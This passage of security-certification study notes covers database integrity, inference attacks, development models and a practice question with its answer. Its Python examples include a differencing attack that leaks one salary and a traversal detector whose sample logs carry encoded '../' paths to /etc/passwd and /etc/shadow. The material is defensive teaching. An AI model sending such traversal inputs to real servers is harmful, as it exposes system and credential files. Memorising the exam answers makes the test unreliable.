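    """Inference by differencing against the naive interface: two aggregate queries leak one salary."""
    everyone = unrestricted_sum(lambda r: True)
    everyone_but_grace = unrestricted_sum(lambda r: r["name"] != "grace")
    return everyone - everyone_but_grace


def is_rejected(predicate):
    """True if the restricted interface refuses the query."""
    try:
        restricted_sum(predicate)
        return False
    except QueryRejected:
        return True


if __name__ == "__main__":
    print("leaked salary via naive interface:", infer_single_salary_unrestricted())
    print("restricted 'dept == sec' rejected:", is_rejected(lambda r: r["dept"] == "sec"))
    print("restricted 'everyone but grace' rejected:", is_rejected(lambda r: r["name"] != "grace"))
    print("restricted eng total with noise:", restricted_sum(lambda r: r["dept"] == "eng", noise_scale=1000))
```

Partitioning, the third technique in the correct answer to question 6, is not shown here; it would store the sensitive rows (the single-member department) in a separate partition that the statistical interface cannot query at all. Small query sets, the distractor in options C and D, are what the attacker wants, not a countermeasure.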

CASE (Computer aided software Engineering)

This is wide variety of automated productivity tools to help programmers, PM's and analysts. - Allows rapid prototyping - Less manual coding means less errors. - Debuggers, code analyzers, version control tools

Database Views (table)

A view is a virtual table defined by a stored query. It can join two or more tables so that reports see data held in more than one table, and it lets you expose only part of the database (selected columns or rows) to a user, which is a common way to implement content-dependent access control without giving users access to the base tables.
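The database integrity cards above (user-defined, semantic, entity and referential integrity, DDL vs DML, and views) demonstrated together in one added Python example using the standard-library sqlite3 module; this is not code from the original page, and the schema, employee data and salary cap are constructed for illustration. The DDL declares a PRIMARY KEY (entity integrity), a FOREIGN KEY (referential integrity), a CHECK on type and range (semantic integrity), a trigger for a business rule (user-defined integrity) and a view that hides the salary column; the DML inserts then show which rule rejects which bad row.

```python
import sqlite3

# Constructed schema (assumption: not from the page). SQLite is loosely typed, so the
# typeof() check is what actually enforces the integer domain of the salary column.
SCHEMA = """
CREATE TABLE department (
    dept_id INTEGER PRIMARY KEY,                 -- entity integrity: unique, non-null key
    name    TEXT NOT NULL UNIQUE
);
CREATE TABLE employee (
    emp_id  INTEGER PRIMARY KEY,                 -- entity integrity
    name    TEXT NOT NULL,
    salary  INTEGER NOT NULL
            CHECK (typeof(salary) = 'integer' AND salary > 0),   -- semantic integrity
    dept_id INTEGER NOT NULL REFERENCES department(dept_id)      -- referential integrity
);
-- user-defined (business) integrity: nobody may be paid above the cap.
-- AFTER INSERT so that the declarative constraints are checked first; RAISE aborts the insert.
CREATE TRIGGER salary_cap AFTER INSERT ON employee
WHEN NEW.salary > 200000
BEGIN
    SELECT RAISE(ABORT, 'business rule: salary exceeds cap');
END;
-- view: joins two tables for reporting and hides the salary column from report users
CREATE VIEW staff_directory AS
    SELECT e.name AS employee, d.name AS department
    FROM employee e JOIN department d ON e.dept_id = d.dept_id;
"""


def new_db():
    """Fresh in-memory database with the schema and a little seed data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")     # SQLite does not enforce FKs unless told to
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO department VALUES (?, ?)",
                     [(1, "engineering"), (2, "operations")])
    conn.execute("INSERT INTO employee VALUES (?, ?, ?, ?)", (1, "alice", 120000, 1))
    conn.commit()
    return conn


def try_insert_employee(conn, row):
    """DML insert; returns None on success or the database's rejection message."""
    try:
        with conn:   # commits on success, rolls back on error
            conn.execute("INSERT INTO employee VALUES (?, ?, ?, ?)", row)
        return None
    except sqlite3.DatabaseError as exc:
        return str(exc)


def integrity_checks():
    """Attempt one violation of each integrity type plus one valid row; report what the DB said."""
    conn = new_db()
    results = {
        "duplicate_pk":  try_insert_employee(conn, (1, "mallory", 50000, 1)),    # entity
        "orphan_fk":     try_insert_employee(conn, (2, "bob", 50000, 99)),       # referential
        "bad_type":      try_insert_employee(conn, (3, "carol", "lots", 1)),     # semantic
        "business_rule": try_insert_employee(conn, (4, "dave", 250000, 1)),      # user-defined
        "valid":         try_insert_employee(conn, (5, "erin", 90000, 2)),
    }
    cursor = conn.execute("SELECT * FROM staff_directory")
    results["view_columns"] = [col[0] for col in cursor.description]
    results["view_rows"] = cursor.fetchall()
    conn.close()
    return results


if __name__ == "__main__":
    for key, value in integrity_checks().items():
        print(f"{key}: {value}")
```

Each rejection comes from the database engine, not from application code, which is the point of declaring integrity rules in the DDL: every client that writes to the table is bound by them, including one that has been compromised.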

28. B. The characters "%20" are encoding values that attackers commonly use in URL encoding attacks. These encoding values can be used to bypass web server filtering rules and can result in the attacker being able to gain unauthorized access to components of the web server. The characters "../" can be used by attackers in similar web server requests, which instruct the web server software to traverse directories that should be inaccessible. This is commonly referred to as a path or directory traversal attack.

Use the following scenario to answer Questions 28-30. Brad is a new security administrator within a retail company. He is discovering several issues that his security team needs to address to better secure their organization overall. When reviewing different web server logs, he finds several HTTP server requests with the characters "%20" and "../". The web server software ensures that users input the correct information within the forms that are presented to them via their web browsers. Brad identifies that the organization has a two-tier network architecture in place, which allows the web servers to directly interact with the back-end database. 28. Which of the following best describes attacks that could be taking place against this organization? A. Cross-site scripting and certification stealing B. URL encoding and directory traversal attacks C. Parameter validation manipulation and session management attacks D. Replay and password brute-force attacks
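What Brad's log review looks like as detection logic, shown as an added Python example that is not part of the original question or its answer. The log lines are constructed in Apache combined-log style; the check parses the request target, percent-decodes it up to twice (a single decode misses "%252e%252e%252f", which is "../" encoded twice) and flags directory traversal whether it appears raw, URL-encoded or double-encoded. A benign "%20" (an encoded space) is left alone, which is why the check looks for the traversal sequence rather than for encoding as such.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumption; not from the page).
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /download?file=../../../../etc/passwd HTTP/1.1" 200 1860',
    '10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /download?file=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 231',
    '10.0.0.9 - - [12/Mar/2024:10:01:11 +0000] "GET /download?file=%252e%252e%252fboot.ini HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/Mar/2024:10:01:15 +0000] "GET /search?q=hello%20world HTTP/1.1" 200 2048',
]

# Request line inside the quotes of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A ".." path segment followed by a separator, not preceded by an ordinary name character,
# so "file=../x" and "/a/../x" match but "archive..old/" does not.
TRAVERSAL_RE = re.compile(r'(?:^|[^A-Za-z0-9.])\.\.[\\/]')


def has_traversal(s):
    """Treat backslashes as separators too, since some servers accept them on Windows."""
    return TRAVERSAL_RE.search(s.replace("\\", "/")) is not None


def analyze_target(target):
    """Classify one request target: raw, URL-encoded or double-URL-encoded traversal."""
    findings = []
    once = unquote(target)
    twice = unquote(once)
    if has_traversal(target):
        findings.append("directory_traversal")
    elif has_traversal(once):
        findings.append("encoded_traversal")
    elif has_traversal(twice):
        findings.append("double_encoded_traversal")
    return findings


def scan_log(lines):
    """Return one alert per log line whose request target carries a traversal sequence."""
    alerts = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = analyze_target(match.group("target"))
        if findings:
            alerts.append({
                "client": line.split()[0],
                "target": match.group("target"),
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(LOG_LINES):
        print(alert["client"], alert["findings"], alert["target"])
```

The 200 status on the double-encoded request is the line worth escalating: the server's filter stopped the single-encoded attempt (403) but not the double-encoded one, which is exactly the filter-bypass the answer to question 28 describes.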

This software development model emphasizes on verification and validation at each phase and testing to take place throughout the project.

V-Model (Refer 59.1. SDLC)

XP (Extreme Programming)

Which development method is where the teams are responsible not only for coding but also for writing the tests used to verify the code. There is minimal focus on structured documentation and it does not scale well for large projects.

Agile - Get the program out ASAP.

Which development model provides 1. Close collaboration 2. Frequent delivery of new, deployable business value 3. Face-to-face communication and knowledge sharing 4. Storyboarding of everything to aid clear communication.

Software Development Methodologies XP

XP - Extreme Programming XP (Extreme programming): Intended to improve software quality and responsiveness to changing customer requirements. XP uses: Programming in pairs or doing extensive code review. Avoiding programming of features until they are actually needed.

Tuple & Attribute

Tuple: a row or record in a table, holding the data about one specific item. Attribute: a column or field in the table.

